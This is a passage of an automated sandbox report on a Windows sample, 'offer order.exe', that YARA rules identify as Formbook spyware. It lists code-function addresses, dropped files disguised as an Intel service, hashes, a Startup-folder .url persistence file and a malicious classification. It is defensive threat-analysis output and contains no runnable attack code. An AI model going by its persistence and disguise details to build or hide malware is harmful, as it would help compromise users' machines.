          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 23_2_0338E824
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 23_2_032DA830
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 23_2_03371002
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 23_2_032E20A0
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 23_2_033820A8
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 23_2_032CB090
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 23_2_033828EC
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 23_2_03381FF1
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 23_2_0338DFCE
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 23_2_032D6E30
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 23_2_0337D616
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 23_2_03382EF7
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 23_2_032B0D20
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 23_2_03382D07
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 23_2_03381D55
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 23_2_032E2581
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 23_2_03372D82
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 23_2_032CD5E0
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 23_2_033825DD
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 23_2_032C841F
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 23_2_0337D466
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 23_2_032DB477
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 23_2_03374496
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 23_2_009AD80C
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 23_2_009AC9D9
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 23_2_009AD141
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 23_2_009ACC95
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 23_2_00992D90
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 23_2_00992D88
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 23_2_00999F80
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 23_2_00992FB0
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 23_2_009ADF0C
          Source: Joe Sandbox View | Dropped File: C:\Users\user\Desktop\offer ordermgr.exe 30193B5CCF8A1834EAC3502EF165350AB74B107451145F3D2937FDF24B9ECEAE
          Source: Joe Sandbox View | Dropped File: C:\Users\user\UevAppMonitor\igfxCUIServicemgr.exe 30193B5CCF8A1834EAC3502EF165350AB74B107451145F3D2937FDF24B9ECEAE
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: String function: 032BB150 appears 136 times
          Source: C:\Users\user\UevAppMonitor\igfxCUIService.exe | Code function: String function: 00060D27 appears 41 times
          Source: C:\Users\user\UevAppMonitor\igfxCUIService.exe | Code function: String function: 00047F41 appears 31 times
          Source: C:\Users\user\Desktop\offer order.exe | Code function: String function: 00DE0D27 appears 36 times
          Source: unknown | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6232 -s 244
          Source: offer order.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: offer order.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: offer order.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: offer order.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: offer ordermgr.exe.0.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: offer ordermgr.exe.0.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: offer ordermgr.exe.0.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: igfxCUIService.exe.0.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: igfxCUIService.exe.0.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: igfxCUIService.exe.0.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: igfxCUIService.exe.0.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: igfxCUIServicemgr.exe.6.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: igfxCUIServicemgr.exe.6.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: igfxCUIServicemgr.exe.6.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: offer order.exe, 0000000C.00000002.360419144.0000000001F9F000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs offer order.exe
          Source: offer order.exe, 0000000C.00000002.359409209.00000000018B9000.00000004.00000020.sdmp | Binary or memory string: OriginalFilenameipconfig.exej% vs offer order.exe
          Source: C:\Windows\SysWOW64\WerFault.exe | Section loaded: sfc.dll
          Source: C:\Windows\SysWOW64\WerFault.exe | Section loaded: phoneinfo.dll
          Source: C:\Windows\SysWOW64\WerFault.exe | Section loaded: ext-ms-win-xblauth-console-l1.dll
          Source: C:\Windows\SysWOW64\WerFault.exe | Section loaded: ext-ms-win-xblauth-console-l1.dll
          Source: C:\Windows\SysWOW64\WerFault.exe | Section loaded: sfc.dll
          Source: C:\Windows\SysWOW64\WerFault.exe | Section loaded: phoneinfo.dll
          Source: C:\Windows\SysWOW64\WerFault.exe | Section loaded: ext-ms-win-xblauth-console-l1.dll
          Source: C:\Windows\SysWOW64\WerFault.exe | Section loaded: ext-ms-win-xblauth-console-l1.dll
          Source: 0000000C.00000002.359244107.0000000001820000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000C.00000002.359244107.0000000001820000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000001A.00000002.358304950.00000000001D0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000001A.00000002.358304950.00000000001D0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000C.00000002.359207981.00000000017F0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000C.00000002.359207981.00000000017F0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000016.00000002.343417017.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000016.00000002.343417017.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000016.00000002.344627421.0000000001710000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000016.00000002.344627421.0000000001710000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000C.00000002.356195697.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000C.00000002.356195697.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000016.00000002.344721716.0000000001740000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000016.00000002.344721716.0000000001740000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000017.00000002.494578696.0000000002BC0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000017.00000002.494578696.0000000002BC0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000017.00000002.492758749.0000000000B30000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000017.00000002.492758749.0000000000B30000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000017.00000002.491918579.0000000000990000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000017.00000002.491918579.0000000000990000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\lpremove.url, type: DROPPEDMatched rule: Methodology_Suspicious_Shortcut_Local_URL author = @itsreallynick (Nick Carr), @QW5kcmV3 (Andrew Thompson), description = Detects local script usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
          Source: 22.2.igfxCUIService.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 22.2.igfxCUIService.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 22.2.igfxCUIService.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 22.2.igfxCUIService.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 12.2.offer order.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 12.2.offer order.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 12.2.offer order.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 12.2.offer order.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: offer order.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: igfxCUIService.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: offer ordermgr.exe.0.dr | Static PE information: Section: UPX1 ZLIB complexity 0.998889661815
          Source: igfxCUIServicemgr.exe.6.dr | Static PE information: Section: UPX1 ZLIB complexity 0.998889661815
          Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@20/15@2/2
          Source: C:\Users\user\Desktop\offer order.exe | Code function: 12_2_00E2A2D5 GetLastError,FormatMessageW, | 12_2_00E2A2D5
          Source: C:\Users\user\Desktop\offer order.exe | Code function: 12_2_00E18713 AdjustTokenPrivileges,CloseHandle, | 12_2_00E18713
          Source: C:\Users\user\Desktop\offer order.exe | Code function: 12_2_00E18CC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,